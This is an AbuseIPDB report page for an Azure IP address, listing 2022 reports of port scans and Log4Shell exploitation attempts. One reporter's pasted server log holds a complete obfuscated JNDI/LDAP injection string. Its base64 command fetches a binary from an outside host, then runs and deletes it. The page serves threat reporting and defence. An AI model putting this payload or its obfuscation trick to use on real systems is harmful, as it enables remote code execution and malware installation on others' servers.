JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 20.118.133.148

20.118.133.148 was found in our database!

This IP was reported 29 times. Confidence of Abuse is 0%: ?

ISP	Microsoft Corporation
Usage Type	Data Center/Web Hosting/Transit
ASN	AS8075
Domain Name	microsoft.com
Country	🇺🇸 United States of America
City	Phoenix, Arizona

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 20.118.133.148

Whois 20.118.133.148

IP Abuse Reports for 20.118.133.148:

This IP address has been reported a total of 29 times from 21 distinct sources. 20.118.133.148 was first reported on August 8th 2022, and the most recent report was 3 years ago.

Old Reports: The most recent abuse report for this IP address is from 3 years ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 Ian Poulsen	2022-08-11 13:41:47 (3 years ago)	Log4Shell Scanning - Aug 09 23:42:22.719	Port Scan
🇺🇸 gu-alvareza	2022-08-10 13:56:40 (3 years ago)	Apache.Log4j.Error.Log.Remote.Code.Execution	Hacking Web App Attack
🇺🇸 Creepingdeth	2022-08-10 11:08:34 (3 years ago)	Rule Category SERVER-OTHER -- Snort has detected traffic exploiting vulnerabilities in a server in ... show more Rule Category SERVER-OTHER -- Snort has detected traffic exploiting vulnerabilities in a server in the network. Alert Message SERVER-OTHER Apache Log4j logging remote code execution attempt Rule Explanation This rule looks for attempts to exploit a remote code execution vulnerability in Log4j's "Lookup" functionality. What To Look For This rule looks for attempts to exploit a remote code execution vulnerability in Log4j's "Lookup" functionality. show less	Hacking Brute-Force SSH
🇿🇦 IrisFlower	2022-08-10 07:21:28 (3 years ago)	Unauthorized connection attempt detected from IP address 20.118.133.148 to port 443 [J]	Port Scan Hacking
🇿🇦 IrisFlower	2022-08-10 05:53:43 (3 years ago)	Unauthorized connection attempt detected from IP address 20.118.133.148 to port 443 [J]	Port Scan Hacking
Anonymous	2022-08-10 02:15:04 (3 years ago)	TCP/443 probe	Port Scan
🇳🇱 NSCA-ISEU	2022-08-10 01:41:47 (3 years ago)	AS8075 Microsoft Corporation. 20.118.133.148 proxies traffic for residential or call-back proxy netw ... show more AS8075 Microsoft Corporation. 20.118.133.148 proxies traffic for residential or call-back proxy networks . Apache Log4j Remote Code Execution Vulnerability show less	VPN IP Web App Attack
🇿🇦 IrisFlower	2022-08-10 00:31:03 (3 years ago)	Unauthorized connection attempt detected from IP address 20.118.133.148 to port 443 [J]	Port Scan Hacking
🇵🇱 kolya	2022-08-09 21:42:21 (3 years ago)	[10/08/2022 01:42:21] Unauthorized connection attempt to port 443, server 90988ed6.	Port Scan
Anonymous	2022-08-09 21:20:02 (3 years ago)	ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)	Hacking
🇵🇱 kolya	2022-08-09 16:39:44 (3 years ago)	[09/08/2022 20:39:44] Unauthorized connection attempt to port 443, server 90988ed6.	Port Scan
🇺🇸 cat	2022-08-09 16:08:47 (3 years ago)	20.118.133.148 - - [10/Aug/2022:04:08:43 +0800] 198.211.45.249 "GET / HTTP/1.1" 400"t('${${env:NaN:- ... show more 20.118.133.148 - - [10/Aug/2022:04:08:43 +0800] 198.211.45.249 "GET / HTTP/1.1" 400"t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//20.111.17.179:443/TomcatBypass/Command/Base64/d2dldCAtbmMgaHR0cDovLzIwLjIwNi43OS4xOC9tYWlubGQgLXEgLVAgL3RtcC87IGNobW9kIDc3NyAvdG1wL21haW5sZDsgL3RtcC9tYWlubGQ7IHJtIC1yZiAvdG1wL21haW5sZA==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//20.111.17.179:443/TomcatBypass/Command/Base64/d2dldCAtbmMgaHR0cDovLzIwLjIwNi43OS4xOC9tYWlubGQgLXEgLVAgL3RtcC87IGNobW9kIDc3NyAvdG1wL21haW5sZDsgL3RtcC9tYWlubGQ7IHJtIC1yZiAvdG1wL21haW5sZA==}')" "-"- - 0.000 show less	Hacking Bad Web Bot Web App Attack
🇺🇸 jayers	2022-08-09 15:27:30 (3 years ago)	intrusion was observed: "Apache.Log4j.Error.Log.Remote.Code.Execution".	Hacking
🇦🇺 FEWA	2022-08-09 15:26:06 (3 years ago)	Fail2Ban Ban Triggered	Hacking Bad Web Bot Web App Attack
🇺🇸 John Smith	2022-08-09 14:57:50 (3 years ago)	looks like this ip was scanning one of my public facing devices for Log4j exploits.	Port Scan Hacking

Showing 1 to 15 of 29 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇪 213.209.159.227

🇳🇱 194.26.192.110

🇯🇵 124.156.212.23

🇭🇰 103.116.75.51

🇩🇪 213.209.159.108

🇺🇦 194.187.155.112

🇺🇸 173.252.95.134

🇧🇷 138.59.191.74

🇹🇭 125.27.11.173

🇫🇷 104.28.228.56

🇮🇳 103.104.127.49

🇫🇷 85.217.140.36

🇫🇮 45.87.249.146

🇬🇧 35.203.210.36

🇺🇸 216.73.217.154

🇬🇧 31.14.254.114

🇲🇽 189.240.44.9

🇨🇦 85.217.149.9

🇺🇸 85.208.96.201

🇷🇴 80.94.95.242